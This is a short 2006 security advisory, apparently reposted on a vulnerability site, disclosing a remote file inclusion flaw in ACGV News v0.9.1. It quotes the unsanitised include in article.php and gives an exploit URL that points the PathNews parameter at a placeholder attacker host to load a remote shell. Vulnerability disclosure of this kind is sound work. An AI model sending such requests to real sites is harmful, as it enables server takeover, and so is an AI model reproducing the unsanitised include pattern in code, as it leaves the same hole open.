Security Advisory: ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Akarru v0.4.3.34 - Remote File Include Vulnerabilities
  Shadow Prémod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability
  BinGo News <= v3.01 (bnrep) Remote File Inclusion Exploit
  [SA21779] Drupal Pathauto Module Cross-Site Scripting Vulnerability

From: SHiKaA-_(at)_hotmail.com <SHiKaA-_(at)_hotmail.com>
Date: 06.09.2006
Subject: ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit

#================================================================================
==============
#ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit
#================================================================================
===============
#
#Critical Level : Dangerous
#
#Venedor site : http://www.acgv.fr.st/
#
#Version : v0.9.1
#
#================================================================================
================
#Bug in : article.php
#
#Vlu Code :
#--------------------------------
#     include_once($PathNews."header.php");
#
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/article.php?PathNews=http://SHELLURL.COM?
#
#
#================================================================================
================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke SimOO KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# =================================================================================
=================

test server